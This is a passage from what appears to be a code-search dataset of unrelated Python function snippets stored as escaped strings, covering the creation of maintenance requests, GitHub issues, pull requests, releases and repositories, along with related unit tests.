cwd=f\"{SUBS_DIR}/{submitter}/{ASSIGNMENT}\", check=True)\n\n submission_path = os.path.realpath(f\"{SUBS_DIR}/{submitter}/{ASSIGNMENT}\")\n subprocess.run(f\"./add_sub_manually.sh {submission_path}\", shell=True, check=False)", "def create_request(v1):\n #get entered data\n data = request.get_json()\n\n #picking the request attributes\n req_title = data.get(\"request_title\")\n req_desc = data.get(\"request_description\")\n requester_name = \"Gideon\"\n req_id = len(all_requests) +1 # + random.randint(1, 3000)\n\n #validation\n if not req_title:\n return jsonify({\"message\": \"Request has no title\"}), 400\n if not req_desc:\n return jsonify({\"message\": \"Request has no description\"}), 400\n if not requester_name:\n return jsonify({\"message\": \"Request must be issued by a user\"}), 400\n if not req_id:\n return jsonify({\"message\": \"Request has no id\"}), 400\n\n #storing entered request\n new_request = MaintenanceRequest(req_title, req_desc, requester_name, req_id)\n all_requests.append(new_request)\n # new_number_of_requests = len(all_requests)\n\n return jsonify({\n \"message\":\"sucessfully created request\",\n 'request_title':new_request.title,\n \"request_description\":new_request.description,\n \"requester_name\" : new_request.requester_name,\n \"request_id\" : new_request.request_id\n })", "def test_build_new_review_request_with_parent_diff(self):\n repository = self._create_repository()\n review_request = self.create_review_request(repository=repository)\n diffset = self.create_diffset(review_request=review_request)\n diffset.base_commit_id = '8fd69d70f07b57c21ad8733c1c04ae604d21493f'\n diffset.save()\n\n filediff = self.create_filediff(diffset)\n filediff.parent_diff = (\n b'--- README\\trevision 123\\n'\n b'+++ README\\trevision 123\\n'\n b'@@ -1 +1 @@\\n'\n b'-Hello, world!\\n'\n b'+Hello, everybody!\\n'\n )\n filediff.save()\n\n config = self._create_config(enterprise=True)\n self.integration.enable_integration()\n\n data = self._spy_on_make_request()\n\n review_request.publish(review_request.submitter)\n\n self.assertTrue(TravisAPI._make_request.called)\n\n self.assertEqual(\n data['url'],\n 'https://travis.example.com/api/repo/'\n 'mypublicorg%2Fmypublicorgrepo/requests')\n\n self.assertEqual(\n data['request']['config']['env']['global'],\n [\n 'REVIEWBOARD_STATUS_UPDATE_ID=1',\n 'REVIEWBOARD_TRAVIS_INTEGRATION_CONFIG_ID=%d' % config.pk,\n ])\n self.assertEqual(data['request']['message'],\n 'Test Summary\\n\\nTest Description')\n self.assertTrue('git checkout %s' % diffset.base_commit_id\n in data['request']['config']['before_install'])\n self.assertEqual(data['request']['branch'], 'review-requests')\n\n patch_count = len(\n [cmd for cmd in data['request']['config']['before_install']\n if 'patch -p1' in cmd])\n\n self.assertEqual(patch_count, 2)", "def create(self, token: Any):\n params = [token, ]\n method = \"ProjectAPI.Create\"\n self.__add_request(method, params, lambda payload: Definition.from_json(payload))", "def create_project():\n client = RequestManager()\n project_name = \"\".join(choices(string.ascii_letters + string.digits, k=10))\n client.set_method(\"POST\")\n client.set_endpoint(\"/projects\")\n body = {\"name\": project_name}\n client.set_body(json.dumps(body))\n response = client.execute_request()\n STORED_ID['project_id'] = response.json()['id']", "def workon(ctx, issue_id, new, base_branch):\n lancet = ctx.obj\n\n if not issue_id and not new:\n raise click.UsageError(\"Provide either an issue ID or the --new flag.\")\n elif issue_id and new:\n raise click.UsageError(\n \"Provide either an issue ID or the --new flag, but not both.\"\n )\n\n if new:\n # Create a new issue\n summary = click.prompt(\"Issue summary\")\n issue = create_issue(\n lancet, summary=summary, add_to_active_sprint=True\n )\n else:\n issue = get_issue(lancet, issue_id)\n\n username = lancet.tracker.whoami()\n active_status = lancet.config.get(\"tracker\", \"active_status\")\n if not base_branch:\n base_branch = lancet.config.get(\"repository\", \"base_branch\")\n\n # Get the working branch\n branch = get_branch(lancet, issue, base_branch)\n\n # Make sure the issue is in a correct status\n transition = get_transition(ctx, lancet, issue, active_status)\n\n # Make sure the issue is assigned to us\n assign_issue(lancet, issue, username, active_status)\n\n # Activate environment\n set_issue_status(lancet, issue, active_status, transition)\n\n with taskstatus(\"Checking out working branch\") as ts:\n lancet.repo.checkout(branch.name)\n ts.ok('Checked out working branch based on \"{}\"'.format(base_branch))\n\n with taskstatus(\"Starting harvest timer\") as ts:\n lancet.timer.start(issue)\n ts.ok(\"Started harvest timer\")", "def review_pr(ctx, slug, token, merge, pr):\n\n # Allow the 'pr' parameter to be either the numerical ID or an URL to the PR on GitHub.\n # Also if it's an URL, parse the proper --slug argument from that.\n m = re.match('^(?:https?://(?:www\\.)?github\\.com/([^/]+/[^/]+)/pull/)?([0-9]+)$', pr, re.IGNORECASE)\n if not m:\n click.echo(\"Error: parameter to 'nox-review pr' must be a valid pull request number or URL.\")\n sys.exit(1)\n pr = m[2]\n if m[1]:\n if slug:\n click.echo(\"Error: '--slug' option can't be used together with a pull request URL.\")\n sys.exit(1)\n slug = m[1]\n elif not slug:\n slug = 'NixOS/nixpkgs'\n\n pr_url = 'https://api.github.com/repos/{}/pulls/{}'.format(slug, pr)\n headers = {}\n if token:\n headers['Authorization'] = 'token {}'.format(token)\n request = requests.get(pr_url, headers=headers)\n if request.status_code == 403 and request.headers['X-RateLimit-Remaining'] == '0':\n click.secho('You have exceeded the GitHub API rate limit. Try again in about an hour.')\n if not token:\n click.secho('Or try running this again, providing an access token:')\n click.secho('$ nox-review pr --token=YOUR_TOKEN_HERE {}'.format(pr))\n sys.exit(1)\n payload = request.json()\n click.echo('=== Reviewing PR {} : {}'.format(\n click.style(pr, bold=True),\n click.style(payload.get('title', '(n/a)'), bold=True)))\n\n base_ref = payload['base']['ref']\n\n repo = get_repo()\n\n click.echo('==> Fetching base ({})'.format(base_ref))\n base_refspec = 'heads/{}'.format(payload['base']['ref'])\n repo.fetch(base_refspec)\n base = repo.sha('FETCH_HEAD')\n\n click.echo('==> Fetching PR')\n head_refspec = 'pull/{}/head'.format(pr)\n repo.fetch(head_refspec)\n head = repo.sha('FETCH_HEAD')\n\n if merge:\n click.echo('==> Fetching extra history for merging')\n depth = 10\n while not repo.merge_base(head, base):\n repo.fetch(base_refspec, depth=depth)\n repo.fetch(head_refspec, depth=depth)\n depth *= 2\n\n # It looks like this isn't enough for a merge, so we fetch more\n repo.fetch(base_refspec, depth=depth)\n\n click.echo('==> Merging PR into base')\n\n repo.checkout(base)\n repo.git(['merge', head, '--no-ff', '-qm', 'Nox automatic merge'])\n merged = repo.sha('HEAD')\n\n old = base\n new = merged\n\n else:\n commits = requests.get(payload['commits_url'], headers=headers).json()\n old = commits[-1]['parents'][0]['sha']\n new = payload['head']['sha']\n\n build_difference(old, new, extra_args=ctx.obj['extra-args'], with_tests=ctx.obj[\"tests\"], disable_test_blacklist=ctx.obj[\"no-blacklist\"], dry_run=ctx.obj['dry_run'])", "def test_create(client):\n rv = create(client, reponame='Michael', url='https://github.com/Michael')\n assert json.loads(rv.data.decode())['code'] == 0\n assert json.loads(rv.data.decode())['owner'] == 'Michael'\n assert json.loads(rv.data.decode())['url'] == 'https://github.com/Michael'", "def create_release(ctx, sha):\n\n try:\n\n gh = ctx.obj.github\n\n log.echo('Creating a GitHub release')\n release = gh.create_release(sha=sha)\n log.echo('Release created: {}'.format(release.url))\n return release\n\n except exceptions.SetupPyNotFoundException as e:\n e.possible_solutions = [solutions.create_setup_py()]\n raise", "def callback_repo_create(self, request, uri, headers, status_code=201):\n # Disabling unused-argument because this is a callback with\n # required method signature.\n # pylint: disable=unused-argument\n self.assertEqual(\n request.headers['Authorization'],\n 'token {0}'.format(self.OAUTH2_TOKEN)\n )\n repo_dict = json.loads(request.body)\n self.assertTrue(\n repo_dict['name'] in [self.TEST_REPO, self.TEST_RERUN_REPO]\n )\n self.assertEqual(repo_dict['description'], self.TEST_DESCRIPTION)\n self.assertEqual(repo_dict['private'], True)\n\n return (status_code, headers, json.dumps({'html_url': 'testing'}))", "def create_issue(self, issue_field_dict, assign_current_user=False):\r\n issue_field_dict = eval(str(issue_field_dict))\r\n print issue_field_dict\r\n\r\n new_issue = self.jira.create_issue(issue_field_dict)\r\n if assign_current_user is True:\r\n self.assign_user_to_issue(new_issue, self.jira.current_user())\r\n return new_issue", "def create_new_python_project():\n\t# Create the different variables\n\tfolder_name = str(sys.argv[1])\n\tdir_name = my_project_folder + folder_name\n\tpy_file = dir_name + '/' + folder_name + '.py'\n\treadme_file = dir_name + '/' + 'README.md'\n\ttodo_file = dir_name + '/' + 'TODO.txt'\n\n\t# Create directory if it does not exist yet\n\tif not os.path.exists(dir_name):\n\t\tos.mkdir(dir_name)\n\t\tprint(\"Directory \" , dir_name , \" Created \")\n\n\t\t# Create Python file\n\t\tdata = ''\n\t\twith open(template_py, 'r') as file:\n\t\t\tdata += file.read()\n\n\t\twith open(py_file, 'w') as f:\n\t\t\tf.write(data)\n\t\t\tprint(\"Python file created\")\n\n\t\t# Create README file\n\t\tdata = ''\n\t\twith open(template_readme, 'r') as file:\n\t\t\tdata += file.read()\n\n\t\twith open(readme_file, 'w') as f:\n\t\t\tf.write(data)\n\t\t\tprint(\"Readme file created\")\n\n\t\t# Create Todo file\n\t\twith open(todo_file, 'w') as f:\n\t\t\tprint(\"TODO file created\")\n\n\t\t# Create Github repo\n\t\twith open(\".env\", \"r\") as f:\n\t\t\tdata = f.read()\n\n\t\tindex_1 = data.find('TOKEN=\"') + len('TOKEN=\"')\n\t\ttoken = data[index_1:-1]\n\t\tg = Github(token)\n\t\tuser = g.get_user()\n\t\trepo = user.create_repo(folder_name)\n\t\tprint(\"Succesfully created repository {}\".format(folder_name))\n\n\n\telse: \n\t\tprint(\"Directory \" , dir_name , \" already exists\")", "def create_from_git(self, token: Any, repo: str):\n params = [token, repo, ]\n method = \"ProjectAPI.CreateFromGit\"\n self.__add_request(method, params, lambda payload: Definition.from_json(payload))", "def _make_new(request, form):\n if not form.is_valid():\n return (None, None)\n account = models.Account.get_account_for_user(request.user)\n if account.blocked:\n # Early exit for blocked accounts.\n return (None, None)\n\n data_url = _get_data_url(form)\n if data_url is None:\n return (None, None)\n data, url, separate_patches = data_url\n\n reviewers = _get_emails(form, 'reviewers')\n if not form.is_valid() or reviewers is None:\n return (None, None)\n\n cc = _get_emails(form, 'cc')\n if not form.is_valid():\n return (None, None)\n\n base = form.get_base()\n if base is None:\n return (None, None)\n\n first_issue_id, _ = models.Issue.allocate_ids(1)\n issue_key = ndb.Key(models.Issue, first_issue_id)\n\n issue = models.Issue(subject=form.cleaned_data['subject'],\n description=form.cleaned_data['description'],\n project=form.cleaned_data['project'],\n base=base,\n repo_guid=form.cleaned_data.get('repo_guid', None),\n reviewers=reviewers,\n cc=cc,\n private=form.cleaned_data.get('private', False),\n n_comments=0,\n key=issue_key)\n issue.put()\n\n first_ps_id, _ = models.PatchSet.allocate_ids(1, parent=issue.key)\n ps_key = ndb.Key(models.PatchSet, first_ps_id, parent=issue.key)\n patchset = models.PatchSet(issue_key=issue.key, data=data, url=url, key=ps_key)\n patchset.put()\n\n if not separate_patches:\n try:\n patches = engine.ParsePatchSet(patchset)\n except:\n # catch all exceptions happening in engine.ParsePatchSet,\n # engine.SplitPatch. With malformed diffs a variety of exceptions could\n # happen there.\n logging.exception('Exception during patch parsing')\n patches = []\n if not patches:\n patchset.key.delete()\n issue.key.delete()\n errkey = url and 'url' or 'data'\n form.errors[errkey] = ['Patch set contains no recognizable patches']\n return (None, None)\n\n ndb.put_multi(patches)\n\n if form.cleaned_data.get('send_mail'):\n msg = _make_message(request, issue, '', '', True)\n issue.put()\n msg.put()\n return (issue, patchset)", "def post_to_github(report, user=None, pw=None, proxies=None):\n proxies = proxies or dict()\n # Determine authentication method. No username or password search for\n # configuration file with GITHUB section\n if not user and not pw:\n # Find configuration file\n cfg = ConfigParser()\n cfgs = cfg.read(['web.cfg', '.web.cfg',\n os.path.expanduser('~/.web.cfg'),\n 'qs.cfg', '.qs.cfg',\n os.path.expanduser('~/.qs.cfg')])\n if cfgs:\n # Grab login information\n try:\n user = cfg.get('GITHUB', 'user')\n pw = cfg.get('GITHUB', 'pw')\n except (NoOptionError, NoSectionError):\n logger.debug('No GITHUB section in configuration file '\n 'with user and pw entries')\n # Grab proxy information if we will be using web.cfg\n if (user or pw) and not proxies:\n try:\n proxy_name = cfg.get('GITHUB', 'proxy')\n logger.debug(\"Using proxy host %s\", proxy_name)\n proxies = {'https': proxy_name}\n except NoOptionError:\n logger.debug(\"No proxy information found\")\n # No valid configurations\n else:\n logger.debug('No \"web.cfg\" file found')\n # Manually ask if we didn't get the username or password already\n if not user:\n user = input('Github Username: ')\n if not pw:\n pw = getpass.getpass('Password for GitHub Account {}: '\n ''.format(user))\n # Our url to create issues via POST\n url = 'https://api.github.com/repos/pcdshub/Bug-Reports/issues'\n # Create the body of the template\n env = Environment(loader=PackageLoader('hutch_python'),\n trim_blocks=True, lstrip_blocks=True)\n template = env.get_template('issue.template')\n body = template.render(report)\n # Requests session\n session = requests.Session()\n session.auth = (user, pw)\n session.proxies.update(proxies)\n issue = {'title': report['title'],\n 'body': body,\n 'assignee': None,\n 'milestone': None,\n 'labels': []} # TODO: Determine hutch to create issue for\n # Post to GitHub\n r = session.post(url, simplejson.dumps(issue))\n if r.status_code == 201:\n logger.info(\"Succesfully created GitHub issue\")\n else:\n logger.exception(\"Could not create GitHub issue. HTTP Status Code: %s\",\n r.status_code)", "async def createComment(self, *args, **kwargs):\n\n return await self._makeApiCall(self.funcinfo[\"createComment\"], *args, **kwargs)", "def open_pr(forked_repo, base_branch, cherry_pick_branch):\n url = f\"https://github.com/python/cpython/compare/{base_branch}...{forked_repo}:{cherry_pick_branch}?expand=1\"\n webbrowser.open_new_tab(url)", "def create_or_update_comment(comment, message, repo, pr_number, token):\n # repo is in the form of \"org/repo\"\n if comment is not None:\n print(\"updating existing comment\")\n # API doc: https://docs.github.com/en/rest/issues/comments?apiVersion=2022-11-28#update-an-issue-comment # noqa\n response = requests.patch(\n f\"https://api.github.com/repos/{repo}/issues/comments/{comment['id']}\",\n headers=get_headers(token),\n json={\"body\": message},\n )\n else:\n print(\"creating new comment\")\n # API doc: https://docs.github.com/en/rest/issues/comments?apiVersion=2022-11-28#create-an-issue-comment # noqa\n response = requests.post(\n f\"https://api.github.com/repos/{repo}/issues/{pr_number}/comments\",\n headers=get_headers(token),\n json={\"body\": message},\n )\n\n response.raise_for_status()", "def _MakeCreateRequest(args, messages, resources, project,\n future_reservation_ref):\n future_reservation = util.MakeFutureReservationMessageFromArgs(\n messages, resources, args, future_reservation_ref)\n future_reservation.description = args.description\n future_reservation.namePrefix = args.name_prefix\n\n return messages.ComputeFutureReservationsInsertRequest(\n futureReservation=future_reservation,\n project=project,\n zone=future_reservation_ref.zone)", "def main():\n\n default_token = os.getenv('GITHUB_API_TOKEN')\n\n parser = argparse.ArgumentParser(\n formatter_class=argparse.RawDescriptionHelpFormatter,\n description=\"\"\"\nShow PRs or a specific PR\n\n github-pr list -r dataxu/test_repo\n github-pr list -r dataxu/test_repo -n 17\n\n - Filters - can be used alone or together\n --filters\n * owner - This will return a list of PRs from the repo that are owned by the github-user\n * status - returns PRs with a specifc status, one of (success, failure, error, pending)\n * label - returns PRs with a specifc label\n * comment - returns PRs that have at least one comment matching a given string\n github-pr list -r dataxu/test_repo --filters 'filter1_name=filter1_value,filter2_name=filter2_value'\n\n github-pr list -r dataxu/test_repo --filters 'owner=frankenstein,status=success,comment=:pitchfork:'\n This returns the number of all PRs in the given repo owned by frankenstein with the status success and containing any comments that have \":pitchfork:\"\n\nCreate a PR\n\n github-pr create -r dataxu/test_repo -t \"PR Title\" --head \"my-test-branch\" --body 'Description Line 1<br/>Line2'\n\nCreate a PR from a fork\n\n github-pr create -r dataxu/test_repo -t \"PR Title\" --head \"my-fork:my-test-branch\"\n\nComment on a PR\n\n github-pr comment -r dataxu/test_repo -n 17 --body \":shipit:\"\n\nMerge a PR by PR number\n\n github-pr merge -r dataxu/test_repo -n 17\n\n github-pr merge -r dataxu/test_repo -n 17 --condition-non-owner-merger --condition-approved-mergers-file=.approved-mergers-file\n This conditional option allows merges to go through checks that validate ownership and team hierarchy.\n ie.\n --condition-approved-mergers user1 user2 user3\n This takes a SPACE-separated list, without quotes or braces\n or\n --condition-approved-mergers-file=.approved-mergers-file\n OPTIONAL: --mergecomment can be set to a different string to search for instead of \":shipit:\"\n\nMerge a PR by branch\n\n github-pr merge -r dataxu/test_repo --head dev-my-branch-name\n github-pr merge -r dataxu/test_repo --head dev-another-branch --base branch-that-is-not-master\n\nDelete a PR\n\n github-pr delete -r dataxu/test_repo -n 17\n\nCheck conditional status checks\n !!!This check only looks at comments AFTER the latest commit, to validate that the\n most recent code (most recent git sha pushed to the PR) has been peer reviewed!!!\n\n github-pr check-condition -r dataxu/dcommand -n 84 --condition-non-owner-merger\n This will check to make sure that the owner can not apply a shipable comment on their own code\n github-pr check-condition -r dataxu/dcommand -n84 --condition-approved-mergers-file=<MAINTAINERS FILE>\n This takes the path to the MAINTAINERS file inside the repo\n Compares commenter to list from a file, single user per line, and checks to make sure they are an approved merger\n github-pr check-condition -r dataxu/dcommand -n 84 --condition-approved-mergers ned_flanders marge_simpson\n This takes a SPACE-separated list, without quotes or braces\n This will check that a comment containing a :shipit: (the default, or other defined comment if merge_comment is set)\n comes from a user in the provided list passed on the commandline. The \"MAINTAINERS file\" option above is the preferred\n convention to use, while this passing the list on the commandline option is primarily for local testing\n when setting up your CD flow.\n \"\"\")\n parser.add_argument('action', choices=['create', 'list', 'merge', 'comment', 'delete', 'update', 'check-condition'], help='action to take')\n parser.add_argument('-r', '--repo', required=True, help='the owner/name of the repository')\n parser.add_argument('-t', '--title', help='the title of the pr')\n parser.add_argument('-f', '--files', action='store_true', default=False, help='list files in the PR')\n parser.add_argument('-n', '--number', type=int, help='pr number')\n parser.add_argument('-l', '--label', nargs='+', help='label(s) to add/apply to the pr (one or more, space separated), or find a list of prs with matching labels (with list action)')\n parser.add_argument('-c', '--comments', action='store_true', help='added to list, to return list of comments')\n parser.add_argument('--filters', help='add this to the list function with collection of options you want to filter your results for', type=str)\n parser.add_argument('--base', default='master', help='branch the pr is against')\n parser.add_argument('--head', help='branch the pr is of')\n parser.add_argument('--body', default='', help='the description of the pr')\n parser.add_argument('--replacelabels', action='store_true', help='replace ALL labels during an update')\n parser.add_argument('--token', default=default_token, help='api token to use')\n parser.add_argument('--numberonly', action='store_true', help='only return the numbers of the PRs during the list action')\n parser.add_argument('--table', action='store_true', help='show a table of output instead of pretty. not compatible with numberonly')\n parser.add_argument('--tableformat', default='simple', help='format of table to use')\n parser.add_argument('--noheaders', action='store_true', help='remove headers from table view. best for programmatic use of this script')\n parser.add_argument('--noratelimit', action='store_true', help=\"don't show the rate limit\")\n parser.add_argument('--mergecomment', default=\":shipit:\", help='string to look for when checking comments for \"shipit\" approval, during MERGE only')\n parser.add_argument('--condition-non-owner-merger', action='store_true', help='stops owner from being able to apply merge comment')\n parser.add_argument('--condition-approved-mergers', default=None, nargs='+', help='list of usernames of approved mergers')\n parser.add_argument('--condition-approved-mergers-file', action='store_true', help='check a file for list of usernames of approved mergers')\n parser.add_argument('--approved-mergers-file-path', default='./MAINTAINERS.txt', help='location of file of usernames of approved mergers')\n parser.add_argument('-v', '--verbose', const=1, default=0, type=int, nargs=\"?\",\n help=\"Logger verbosity: 0 = WARN (default), 1 = INFO, 2 = DEBUG\")\n\n args = vars(parser.parse_args())\n logging.basicConfig(format=\"%(asctime)s %(levelname)-7s %(filename)20s:%(lineno)-4d | %(message)s\")\n\n if args['verbose'] == 0:\n logger.setLevel(logging.WARN) \n elif args['verbose'] == 1:\n logger.setLevel(logging.INFO) \n elif args['verbose'] == 2:\n logger.setLevel(logging.DEBUG)\n\n if 'action' in args and args['action'] == 'create':\n github_create_pr(**args)\n\n elif 'action' in args and args['action'] == 'list':\n github_list_prs(**args)\n\n elif 'action' in args and args['action'] == 'merge':\n if 'number' in args and args['number']:\n github_merge_pr_by_number(**args)\n else:\n github_merge_pr_by_branch(**args)\n\n elif 'action' in args and args['action'] == 'comment':\n github_comment_pr(**args)\n\n elif 'action' in args and args['action'] == 'delete':\n github_delete_pr(**args)\n\n elif 'action' in args and args['action'] == 'update':\n github_update_pr(**args)\n\n elif 'action' in args and args['action'] == 'check-condition':\n github_check_condition(**args)\n\n gh = Github(args['token'])\n\n if (('numberonly' in args) and not args['numberonly']):\n if (('noratelimit' in args) and not args['noratelimit']):\n print \"Github Rate Limiting: %d remaining of max %d\" % (gh.rate_limiting[0], gh.rate_limiting[1])", "def pullrequest(self):\n target = self.get_data(\"target\")\n if target[\"type\"] == \"pipeline_pullrequest_target\":\n return PullRequest(\n target[\"pullrequest\"][\"links\"][\"self\"][\"href\"],\n target[\"pullrequest\"],\n **self._new_session_args\n ) # fmt: skip\n else:\n return None", "def create_branch(ctx, name, sha):\n\n try:\n\n gh = ctx.obj.github\n\n log.echo('Creating branch...', break_line=False)\n branch = gh.create_branch(name=name, sha=sha)\n log.checkmark()\n log.echo('Branch {} created at {}'.format(name, sha))\n return branch\n except BaseException as _:\n log.xmark()\n raise", "def _create_issue(*, image: str, repo: str, run: str, stacktrace: str) -> Issue:\n title = f\"Automatic error report from {repo}\"\n body = _report_body(image=image, repo=repo, run=run, stacktrace=stacktrace)\n return TAGBOT_ISSUES_REPO.create_issue(title, body)", "def test_valid_pull_request(self):\n with tempfile.TemporaryDirectory() as tmp_dir:\n out_path = os.path.join(tmp_dir, 'out')\n os.mkdir(out_path)\n self.assertTrue(\n cifuzz.build_fuzzers(EXAMPLE_PROJECT,\n 'oss-fuzz',\n tmp_dir,\n pr_ref='refs/pull/1757/merge'))\n self.assertTrue(\n os.path.exists(os.path.join(out_path, EXAMPLE_BUILD_FUZZER)))", "def test_create_an_issue(self):\n url = reverse('bulletin:issue-create',\n kwargs={'pk': self.newsletter.id})\n response = self.client.get(url,\n follow=True)\n self.assertEqual(response.status_code, 200)\n\n initial_num_newsletter_issues = self.newsletter.issues.count()\n url = reverse('bulletin:issue-create',\n kwargs={'pk': self.newsletter.id})\n response = self.client.post(url,\n data={'pub_date': '2014-10-04',\n 'name': 'Excellent issue'},\n follow=True)\n self.assertEqual(response.status_code, 200)\n self.assertEqual(self.newsletter.issues.count(),\n initial_num_newsletter_issues + 1)", "def create_release(config, args):\n yield config.repo.create_release(args.tag_name, name=args.name,\n target_commitish=args.get(\"target_commitish\"), body=args.get(\"body\"),\n draft=args.get_bool(\"draft\"), prerelease=args.get_bool(\"prerelease\"))", "def create_pr_notification(package, repository, id):\n # type: (str, str, int) -> str\n notification_dict = {\n \"repository\": repository,\n \"package\": package,\n \"event\": \"pull-request\",\n \"id\": id\n }\n return json.dumps(notification_dict)", "def create_request(self, config):\n self.logger.info(\"Injecting request args:\\n%s ...\", config.request_args[\"createRequest\"])\n json_args = json.dumps(config.request_args[\"createRequest\"])\n urn = self.urn_prefix + \"/request\"\n status, data = self.http_request(\"POST\", urn, data=json_args,\n headers=self.headersBody)\n if status > 216:\n self.logger.error(\"Failed to create request with status: %s, data: %s\", status, data)\n sys.exit(1)\n data = json.loads(data)\n self.logger.info(data)\n request_name = data[\"result\"][0][\"request\"]\n self.approve_request(request_name)\n self.logger.info(\"Create request '%s' succeeded.\", request_name)\n\n config.request_names = request_name\n\n return request_name", "def api_github_message():\n if request.headers['Content-Type'] == 'application/json':\n print('inside server ')\n my_info = json.dumps(request.json)\n payload = json.loads(my_info)\n if not payload['action'] == 'closed':\n model = StoreModel().loadData()\n tdf = TestData()\n tdf1 = TestData1()\n parameter_dict = tdf.fetcher(my_info)\n extension_file = tdf1.file_fetcher(my_info)\n feature_dict = parameter_dict['feature_dict']\n comment_url = parameter_dict['comment_url']\n comment_body = tdf.test_feeder(feature_dict, model)\n file_comment_body = tdf1.file_test_feeder(extension_file[0], extension_file[1])\n Comment.post_comment(comment_url, comment_body)\n Comment.post_comment(comment_url, str(file_comment_body))\n app.logger.info(comment_body)\n prediction_response = json.dumps({\"state\": comment_body})\n app.logger.info(comment_body)\n res = Response(prediction_response, status=200, mimetype='application.json')\n return res\n prediction_response = json.dumps({\"state\": \"closed pull request\"})\n app.logger.info(\"closed pull request\")\n res = Response(prediction_response, status=200, mimetype='application.json')\n return res", "def cmd_create(self):\n self.repo.create()\n\n # Add .gitignore.\n self.repo.add_files({'.gitignore': '.swp\\n'}, FIRST_COMMIT_MSG)\n\n # Create the etc and timestamps branches.\n self.repo.checkout('etc', create=True)\n self.repo.checkout('timestamps', create=True)\n\n self.repo.checkout('master')\n self.repo.init()\n self.update_repository()\n print('Git repository created at %s' % self.repodir)", "def test_project_creation(self):\n title = 'Project title'\n code = 'SCW-12345'\n project = self.create_project(\n title=title,\n code=code,\n institution=self.institution,\n tech_lead=self.project_owner,\n category=self.category,\n funding_source=self.funding_source,\n )\n self.assertTrue(isinstance(project, Project))\n self.assertEqual(project.__str__(), code + ' - ' + title)\n self.assertEqual(project.status, Project.AWAITING_APPROVAL)\n self.assertEqual(project.title, title)\n self.assertEqual(project.code, code)\n self.assertTrue(project.awaiting_approval())", "def test_create_with_new_draft_and_custom_changedesc(self):\n review_request = self.create_review_request(\n publish=True,\n bugs_closed='1,20,300',\n commit_id='abc123',\n description_rich_text=True,\n rich_text=True,\n testing_done_rich_text=True,\n extra_data={\n 'key': {\n 'values': [1, 2, 3],\n },\n 'mybool': True,\n })\n\n # Create the draft.\n changedesc = ChangeDescription.objects.create()\n orig_draft = ReviewRequestDraft.create(review_request,\n changedesc=changedesc)\n\n self.assertEqual(orig_draft.changedesc_id, changedesc.pk)\n self.assertEqual(ChangeDescription.objects.count(), 1)\n\n # Reload to be sure.\n draft = ReviewRequestDraft.objects.get(pk=orig_draft.pk)\n self.assertEqual(orig_draft, draft)\n self.assertEqual(draft.changedesc, changedesc)", "def create_new(self, name):\n validate_name(name, self.__class__.__name__)\n self.data = {\n \"author_name\": \"\",\n \"author_email\": \"\",\n \"git_profile_url\": \"\",\n \"starting_version\": \"0.1.0\",\n \"default_description\": \"My project, created using nusex\",\n \"preferred_license\": \"unlicense\",\n }", "def create(self, request, *args, **kwargs):\n project = Project.objects.get(id=kwargs[\"projects_pk\"])\n self.check_object_permissions(request, project)\n\n serializer = self.get_serializer(data=request.data)\n if serializer.is_valid():\n serializer.save(permission=\"contributor\", role=\"Contributor\")\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)", "async def new_label(event, gh, *args, **kwargs):\n if event.data[\"label\"][\"name\"] == TRIVIAL_LABEL:\n issue_number_found = ISSUE_RE.search(\n event.data[\"pull_request\"][\"title\"])\n if issue_number_found:\n status = create_success_status(issue_number_found)\n else:\n status = TRIVIAL_STATUS\n await _post_status(event, gh, status)", "def create_new_test_run():\n if debug:\n print('[DEBUG] Func: create_new_test_run...')\n\n new_test_run_url = \"https://eei.testrail.com/index.php?/api/v2/add_run/{0}=\".format(project_id)\n\n new_test_run_json = {\n \"suite_id\": suite_id,\n \"name\": suite_name,\n \"assignedto_id\": assignedto_id,\n \"include_all\": False,\n \"case_ids\": [testcase_id]\n }\n\n new_test_run = requests.post(new_test_run_url, auth=authorization, json=new_test_run_json)\n\n if str(new_test_run.status_code) != '200':\n print('[ERROR] new_test_run: non 200 status code... ' + str(new_test_run.status_code))\n print(str(new_test_run.json()))\n sys.exit(1)\n\n global new_test_run_id\n new_test_run_id = str(new_test_run.json()[\"id\"])", "async def create_from_git(self, token: Any, repo: str) -> Definition:\n response = await self._invoke({\n \"jsonrpc\": \"2.0\",\n \"method\": \"ProjectAPI.CreateFromGit\",\n \"id\": self.__next_id(),\n \"params\": [token, repo, ]\n })\n assert response.status // 100 == 2, str(response.status) + \" \" + str(response.reason)\n payload = await response.json()\n if 'error' in payload:\n raise ProjectAPIError.from_json('create_from_git', payload['error'])\n return Definition.from_json(payload['result'])", "def openNewIssueUrl(self):\r\n url = QUrl(\"https://github.com/Freeseer/freeseer/issues/new\")\r\n QDesktopServices.openUrl(url)", "def repository_create_hosted():\n pass", "def create(self, name, scm=None, is_private=False):\r\n params = base.get_params(('name', 'scm'), locals())\r\n params['is_private'] = 'true' if is_private else 'false'\r\n request = http.Request('POST', self.get_url(), params)\r\n\r\n return request, parsers.parse_json", "def newTask(name, description, assigner, id=None, priority=None, submitter_email=None, whose=None):\n if whose:\n user_id = jutdaapi.find_user(whose)\n if not user_id:\n raise ValueError('bad whose assignment: '+str(whose))\n #title = name + ' for: '+assigner.title()\n # that was the old scheme\n title = '('+assigner.title()+') '+name\n\n if priority != None:\n #priority = (int(priority) + 2) / 2\n priority = int(priority)\n RA_queue = 3\n #if assigner != 'no one':\n # description += '<tasktrackermeta assigner=\"'+assigner+'\"/>'\n if isinstance(id, str):\n description += '<tasktrackermeta id=\"'+id+'\"/>'\n ticket_id = jutdaapi.create_ticket(RA_queue, title, description,\n priority=priority, submitter_email=submitter_email)\n # Is there a race condition here? In this kind of database\n # I would assume not.\n time.sleep(1)\n ticket = jutdaapi.get_detailed_ticket(ticket_id)\n t = ticketToTask(ticket)\n return t", "def create_release(\n self,\n ) -> Callable[[cloud_deploy.CreateReleaseRequest], operations_pb2.Operation]:\n # Generate a \"stub function\" on-the-fly which will actually make\n # the request.\n # gRPC handles serialization and deserialization, so we just need\n # to pass in the functions for each.\n if \"create_release\" not in self._stubs:\n self._stubs[\"create_release\"] = self.grpc_channel.unary_unary(\n \"/google.cloud.deploy.v1.CloudDeploy/CreateRelease\",\n request_serializer=cloud_deploy.CreateReleaseRequest.serialize,\n response_deserializer=operations_pb2.Operation.FromString,\n )\n return self._stubs[\"create_release\"]", "def post(self):\n if not request.json:\n return None, 400\n\n created_git_repository: GitRepositoryModel = self.datastore.create(document=request.json)\n return created_git_repository, 201", "def collection_post(request):\n user_id = request.validated['contributor_id']\n user = request.contract.get_user(user_id)\n contribution_type = request.validated['type']\n try:\n contribution = 